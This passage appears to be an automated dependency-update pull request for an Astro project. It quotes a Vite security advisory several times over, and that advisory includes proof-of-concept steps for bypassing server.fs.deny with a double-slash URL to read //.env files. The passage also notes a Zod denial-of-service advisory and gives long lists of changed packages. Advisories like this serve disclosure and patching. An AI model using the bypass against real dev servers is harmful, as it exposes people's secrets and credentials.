Only users explicitly exposing the Vite dev server to the network (using --host or the server.host config option) are affected and only files in the immediate Vite project root folder could be exposed.\n\n### Patches\nFixed in vite@4.3.9, vite@4.2.3, vite@4.1.5, vite@4.0.5 and in the latest minors of the previous two majors, vite@3.2.7 and vite@2.9.16.

Details

Vite serves the application with under the root-path of the project while running on the dev mode. By default, Vite uses the server option fs.deny to protect sensitive files. But using a simple double forward-slash, we can bypass this restriction. \n\n### PoC\n1. Create a new latest project of Vite using any package manager. (here I'm using react and vue templates and pnpm for testing)\n2. Serve the application on dev mode using pnpm run dev.\n3. Directly access the file via url using double forward-slash (//) (e.g: //.env, //.env.local)\n4. The server option fs.deny was successfully bypassed.

Proof Images: proof-1\nproof-2

🚨 Vite Server Options (server.fs.deny) can be bypassed using double forward-slash (//)

The issue involves a security vulnerability in Vite where the server options can be bypassed using a double forward slash (//). This vulnerability poses a potential security risk as it can allow unauthorized access to sensitive directories and files.

Steps to Fix. Update Vite: Ensure that you are using the latest version of Vite. Security issues like this are often fixed in newer releases.\n2. Secure the server configuration: In your vite.config.js file, review and update the server configuration options to restrict access to unauthorized requests or directories.

Impact

Only users explicitly exposing the Vite dev server to the network (using --host or the server.host config option) are affected and only files in the immediate Vite project root folder could be exposed.\n\n### Patches\nFixed in vite@4.3.9, vite@4.2.3, vite@4.1.5, vite@4.0.5 and in the latest minors of the previous two majors, vite@3.2.7 and vite@2.9.16.

Details

Vite serves the application with under the root-path of the project while running on the dev mode. By default, Vite uses the server option fs.deny to protect sensitive files. But using a simple double forward-slash, we can bypass this restriction. \n\n### PoC\n1. Create a new latest project of Vite using any package manager. (here I'm using react and vue templates and pnpm for testing)\n2. Serve the application on dev mode using pnpm run dev.\n3. Directly access the file via url using double forward-slash (//) (e.g: //.env, //.env.local)\n4. The server option fs.deny was successfully bypassed.

Proof Images: proof-1\nproof-2

🚨 Vite Server Options (server.fs.deny) can be bypassed using double forward-slash (//)

The issue involves a security vulnerability in Vite where the server options can be bypassed using a double forward slash (//). This vulnerability poses a potential security risk as it can allow unauthorized access to sensitive directories and files.

Steps to Fix. Update Vite: Ensure that you are using the latest version of Vite. Security issues like this are often fixed in newer releases.\n2. Secure the server configuration: In your vite.config.js file, review and update the server configuration options to restrict access to unauthorized requests or directories.

Impact

Only users explicitly exposing the Vite dev server to the network (using --host or the server.host config option) are affected and only files in the immediate Vite project root folder could be exposed.\n\n### Patches\nFixed in vite@4.3.9, vite@4.2.3, vite@4.1.5, vite@4.0.5 and in the latest minors of the previous two majors, vite@3.2.7 and vite@2.9.16.

Details

Vite serves the application with under the root-path of the project while running on the dev mode. By default, Vite uses the server option fs.deny to protect sensitive files. But using a simple double forward-slash, we can bypass this restriction. \n\n### PoC\n1. Create a new latest project of Vite using any package manager. (here I'm using react and vue templates and pnpm for testing)\n2. Serve the application on dev mode using pnpm run dev.\n3. Directly access the file via url using double forward-slash (//) (e.g: //.env, //.env.local)\n4. The server option fs.deny was successfully bypassed.

Proof Images: proof-1\nproof-2

🚨 Vite Server Options (server.fs.deny) can be bypassed using double forward-slash (//)

The issue involves a security vulnerability in Vite where the server options can be bypassed using a double forward slash (//). This vulnerability poses a potential security risk as it can allow unauthorized access to sensitive directories and files.

Steps to Fix. Update Vite: Ensure that you are using the latest version of Vite. Security issues like this are often fixed in newer releases.\n2. Secure the server configuration: In your vite.config.js file, review and update the server configuration options to restrict access to unauthorized requests or directories.

Impact

Only users explicitly exposing the Vite dev server to the network (using --host or the server.host config option) are affected and only files in the immediate Vite project root folder could be exposed.\n\n### Patches\nFixed in vite@4.3.9, vite@4.2.3, vite@4.1.5, vite@4.0.5 and in the latest minors of the previous two majors, vite@3.2.7 and vite@2.9.16.

Details

Vite serves the application with under the root-path of the project while running on the dev mode. By default, Vite uses the server option fs.deny to protect sensitive files. But using a simple double forward-slash, we can bypass this restriction. \n\n### PoC\n1. Create a new latest project of Vite using any package manager. (here I'm using react and vue templates and pnpm for testing)\n2. Serve the application on dev mode using pnpm run dev.\n3. Directly access the file via url using double forward-slash (//) (e.g: //.env, //.env.local)\n4. The server option fs.deny was successfully bypassed.

Proof Images: proof-1\nproof-2

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 23 commits:

↗️ vitefu (indirect, 0.2.2 → 1.0.4) · Repo · Changelog

Release Notes

1.0.4

  • Allow Vite 6 peer dependency (remove beta support)

1.0.3

  • Allow Vite 6 beta peer dependency (experimental support)

NOTE: v1.0.1 and v1.0.2 are hot fixes for the types exports.

1.0.2 (from changelog)

  • Duplicate CJS types to correct ESM types export

1.0.1 (from changelog)

  • Fix ESM types export

1.0.0

The library is now v1! This release is mostly ceremonial as the API has been stable for a while without any plans to change it. As such, there are no breaking changes.

  • Remove top-level await to allow future compatibility to require ESM code
  • Export proper ESM and CJS types

0.2.5

  • Align findDepPkgJsonPath implementation with Vite
  • Allow Vite 5 peer dependency

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 20 commits:

↗️ which-pm (indirect, 2.0.0 → 3.0.0) · Repo

Sorry, we couldn’t find anything useful about this release.

↗️ widest-line (indirect, 4.0.1 → 5.0.0) · Repo

Release Notes

5.0.0

Breaking

v4.0.1...v5.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 4 commits:

↗️ yocto-queue (indirect, 0.1.0 → 1.1.1) · Repo

Release Notes

1.1.1

  • Fix Node.js 12 compatibility 90ab935

v1.1.0...v1.1.1

1.1.0

v1.0.0...v1.1.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 9 commits:

↗️ zod (indirect, 3.19.1 → 3.24.1) · Repo · Changelog

Security Advisories 🚨

🚨 Zod denial of service vulnerability

Zod version 3.22.2 allows an attacker to perform a denial of service while validating emails.

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

🆕 @​astrojs/internal-helpers (added, 0.4.2)

🆕 @​babel/plugin-transform-react-jsx-self (added, 7.25.9)

🆕 @​babel/plugin-transform-react-jsx-source (added, 7.25.9)

🆕 @​emnapi/runtime (added, 1.3.1)

🆕 @​esbuild/aix-ppc64 (added, 0.24.0)

🆕 @​esbuild/android-arm64 (added, 0.24.0)

🆕 @​esbuild/android-x64 (added, 0.24.0)

🆕 @​esbuild/darwin-arm64 (added, 0.24.0)

🆕 @​esbuild/darwin-x64 (added, 0.24.0)

🆕 @​esbuild/freebsd-arm64 (added, 0.24.0)

🆕 @​esbuild/freebsd-x64 (added, 0.24.0)

🆕 @​esbuild/linux-arm (added, 0.24.0)

🆕 @​esbuild/linux-arm64 (added, 0.24.0)

🆕 @​esbuild/linux-ia32 (added, 0.24.0)

🆕 @​esbuild/linux-mips64el (added, 0.24.0)

🆕 @​esbuild/linux-ppc64 (added, 0.24.0)

🆕 @​esbuild/linux-riscv64 (added, 0.24.0)

🆕 @​esbuild/linux-s390x (added, 0.24.0)

🆕 @​esbuild/linux-x64 (added, 0.24.0)

🆕 @​esbuild/netbsd-x64 (added, 0.24.0)

🆕 @​esbuild/openbsd-arm64 (added, 0.24.0)

🆕 @​esbuild/openbsd-x64 (added, 0.24.0)

🆕 @​esbuild/sunos-x64 (added, 0.24.0)

🆕 @​esbuild/win32-arm64 (added, 0.24.0)

🆕 @​esbuild/win32-ia32 (added, 0.24.0)

🆕 @​esbuild/win32-x64 (added, 0.24.0)

🆕 @​img/sharp-darwin-arm64 (added, 0.33.5)

🆕 @​img/sharp-darwin-x64 (added, 0.33.5)

🆕 @​img/sharp-libvips-darwin-arm64 (added, 1.0.4)

🆕 @​img/sharp-libvips-darwin-x64 (added, 1.0.4)

🆕 @​img/sharp-libvips-linux-arm (added, 1.0.5)

🆕 @​img/sharp-libvips-linux-arm64 (added, 1.0.4)

🆕 @​img/sharp-libvips-linux-s390x (added, 1.0.4)

🆕 @​img/sharp-libvips-linux-x64 (added, 1.0.4)

🆕 @​img/sharp-libvips-linuxmusl-arm64 (added, 1.0.4)

🆕 @​img/sharp-libvips-linuxmusl-x64 (added, 1.0.4)

🆕 @​img/sharp-linux-arm (added, 0.33.5)

🆕 @​img/sharp-linux-arm64 (added, 0.33.5)

🆕 @​img/sharp-linux-s390x (added, 0.33.5)

🆕 @​img/sharp-linux-x64 (added, 0.33.5)

🆕 @​img/sharp-linuxmusl-arm64 (added, 0.33.5)

🆕 @​img/sharp-linuxmusl-x64 (added, 0.33.5)

🆕 @​img/sharp-wasm32 (added, 0.33.5)

🆕 @​img/sharp-win32-ia32 (added, 0.33.5)

🆕 @​img/sharp-win32-x64 (added, 0.33.5)

🆕 @​oslojs/encoding (added, 1.1.0)

🆕 @​rollup/pluginutils (added, 5.1.4)

🆕 @​rollup/rollup-android-arm-eabi (added, 4.28.1)

🆕 @​rollup/rollup-android-arm64 (added, 4.28.1)

🆕 @​rollup/rollup-darwin-arm64 (added, 4.28.1)

🆕 @​rollup/rollup-darwin-x64 (added, 4.28.1)

🆕 @​rollup/rollup-freebsd-arm64 (added, 4.28.1)

🆕 @​rollup/rollup-freebsd-x64 (added, 4.28.1)

🆕 @​rollup/rollup-linux-arm-gnueabihf (added, 4.28.1)

🆕 @​rollup/rollup-linux-arm-musleabihf (added, 4.28.1)

🆕 @​rollup/rollup-linux-arm64-gnu (added, 4.28.1)

🆕 @​rollup/rollup-linux-arm64-musl (added, 4.28.1)

🆕 @​rollup/rollup-linux-loongarch64-gnu (added, 4.28.1)

🆕 @​rollup/rollup-linux-powerpc64le-gnu (added, 4.28.1)

🆕 @​rollup/rollup-linux-riscv64-gnu (added, 4.28.1)

🆕 @​rollup/rollup-linux-s390x-gnu (added, 4.28.1)

🆕 @​rollup/rollup-linux-x64-gnu (added, 4.28.1)

🆕 @​rollup/rollup-linux-x64-musl (added, 4.28.1)

🆕 @​rollup/rollup-win32-arm64-msvc (added, 4.28.1)

🆕 @​rollup/rollup-win32-ia32-msvc (added, 4.28.1)

🆕 @​rollup/rollup-win32-x64-msvc (added, 4.28.1)

🆕 @​shikijs/core (added, 1.24.2)

🆕 @​shikijs/engine-javascript (added, 1.24.2)

🆕 @​shikijs/engine-oniguruma (added, 1.24.2)

🆕 @​shikijs/types (added, 1.24.2)

🆕 @​shikijs/vscode-textmate (added, 9.3.1)

🆕 @​types/cookie (added, 0.6.0)

🆕 @​ungap/structured-clone (added, 1.2.1)

🆕 @​vitejs/plugin-react (added, 4.3.4)

🆕 aria-query (added, 5.3.2)

🆕 axobject-query (added, 4.1.0)

🆕 base-64 (added, 1.0.0)

🆕 deterministic-object-hash (added, 2.0.2)

🆕 devalue (added, 5.1.1)

🆕 devlop (added, 1.1.0)

🆕 emoji-regex-xs (added, 1.0.0)

🆕 find-up-simple (added, 1.0.0)

🆕 flattie (added, 1.1.1)

🆕 get-east-asian-width (added, 1.3.0)

🆕 hast-util-from-html (added, 2.0.3)

🆕 hast-util-to-text (added, 4.0.2)

🆕 http-cache-semantics (added, 4.1.1)

🆕 is-inside-container (added, 1.0.0)

🆕 magicast (added, 0.3.5)

🆕 mdast-util-phrasing (added, 4.1.0)

🆕 neotraverse (added, 0.6.18)

🆕 oniguruma-to-es (added, 0.7.0)

🆕 p-queue (added, 8.0.1)

🆕 p-timeout (added, 6.1.3)

🆕 react-refresh (added, 0.14.2)

🆕 regex (added, 5.0.2)

🆕 regex-recursion (added, 4.3.0)

🆕 regex-utilities (added, 2.3.0)

🆕 remark-stringify (added, 11.0.0)

🆕 server-destroy (added, 1.0.1)

🆕 tinyexec (added, 0.3.1)

🆕 tsconfck (added, 3.1.4)

🆕 ultrahtml (added, 1.5.3)

🆕 unist-util-find-after (added, 5.0.0)

🆕 xxhash-wasm (added, 1.1.0)

🆕 yocto-spinner (added, 0.1.2)

🆕 yoctocolors (added, 2.1.1)

🆕 zod-to-json-schema (added, 3.24.1)

🆕 zod-to-ts (added, 1.2.0)

🗑️ @​astrojs/language-server (removed)

🗑️ @​astrojs/micromark-extension-mdx-jsx (removed)

🗑️ @​astrojs/webapi (removed)

🗑️ @​babel/helper-annotate-as-pure (removed)

🗑️ @​babel/helper-simple-access (removed)

🗑️ @​babel/plugin-syntax-jsx (removed)

🗑️ @​babel/plugin-transform-react-jsx (removed)

🗑️ @​emmetio/abbreviation (removed)

🗑️ @​emmetio/css-abbreviation (removed)

🗑️ @​emmetio/scanner (removed)

🗑️ @​ljharb/has-package-exports-patterns (removed)

🗑️ @​pkgr/utils (removed)

🗑️ @​proload/core (removed)

🗑️ @​proload/plugin-tsm (removed)

🗑️ @​types/acorn (removed)

🗑️ @​types/estree-jsx (removed)

🗑️ @​types/html-escaper (removed)

🗑️ @​types/json5 (removed)

🗑️ @​types/parse5 (removed)

🗑️ @​types/resolve (removed)

🗑️ @​types/yargs-parser (removed)

🗑️ @​vscode/emmet-helper (removed)

🗑️ @​vscode/l10n (removed)

🗑️ acorn-jsx (removed)

🗑️ ast-types (removed)

🗑️ boolean (removed)

🗑️ character-reference-invalid (removed)

🗑️ data-uri-to-buffer (removed)

🗑️ deepmerge-ts (removed)

🗑️ define-lazy-prop (removed)

🗑️ define-properties (removed)

🗑️ detect-node (removed)

🗑️ eastasianwidth (removed)

🗑️ emmet (removed)

🗑️ es6-error (removed)

🗑️ estree-util-is-identifier-name (removed)

🗑️ estree-util-visit (removed)

🗑️ extend-shallow (removed)

🗑️ fetch-blob (removed)

🗑️ formdata-polyfill (removed)

🗑️ global-agent (removed)

🗑️ globalthis (removed)

🗑️ globalyzer (removed)

🗑️ globrex (removed)

🗑️ gray-matter (removed)

🗑️ has-package-exports (removed)

🗑️ has-property-descriptors (removed)

🗑️ hast-to-hyperscript (removed)

🗑️ html-entities (removed)

🗑️ inline-style-parser (removed)

🗑️ is-alphabetical (removed)

🗑️ is-alphanumerical (removed)

🗑️ is-buffer (removed)

🗑️ is-decimal (removed)

🗑️ is-extendable (removed)

🗑️ is-hexadecimal (removed)

🗑️ is-unicode-supported (removed)

🗑️ json-stringify-safe (removed)

🗑️ jsonc-parser (removed)

🗑️ kind-of (removed)

🗑️ matcher (removed)

🗑️ mdast-util-mdx-expression (removed)

🗑️ mdast-util-mdx-jsx (removed)

🗑️ micromark-extension-mdx-expression (removed)

🗑️ micromark-extension-mdx-md (removed)

🗑️ micromark-factory-mdx-expression (removed)

🗑️ micromark-util-events-to-acorn (removed)

🗑️ node-domexception (removed)

🗑️ node-fetch (removed)

🗑️ object-keys (removed)

🗑️ parse-entities (removed)

🗑️ path-browserify (removed)

🗑️ recast (removed)

🗑️ roarr (removed)

🗑️ section-matter (removed)

🗑️ semver-compare (removed)

🗑️ serialize-error (removed)

🗑️ sourcemap-codec (removed)

🗑️ strip-bom-string (removed)

🗑️ style-to-object (removed)

🗑️ supports-esm (removed)

🗑️ synckit (removed)

🗑️ tiny-glob (removed)

🗑️ tsconfig-resolver (removed)

🗑️ tsm (removed)

🗑️ typescript (removed)

🗑️ unherit (removed)

🗑️ unist-builder (removed)

🗑️ unist-util-generated (removed)

🗑️ unist-util-map (removed)

🗑️ unist-util-position-from-estree (removed)

🗑️ uvu (removed)

🗑️ vscode-css-languageservice (removed)

🗑️ vscode-html-languageservice (removed)

🗑️ vscode-jsonrpc (removed)

🗑️ vscode-languageserver (removed)

🗑️ vscode-languageserver-protocol (removed)

🗑️ vscode-languageserver-textdocument (removed)

🗑️ vscode-languageserver-types (removed)

🗑️ vscode-nls (removed)

🗑️ vscode-oniguruma (removed)

🗑️ vscode-textmate (removed)

🗑️ vscode-uri (removed)

🗑️ web-streams-polyfill (removed)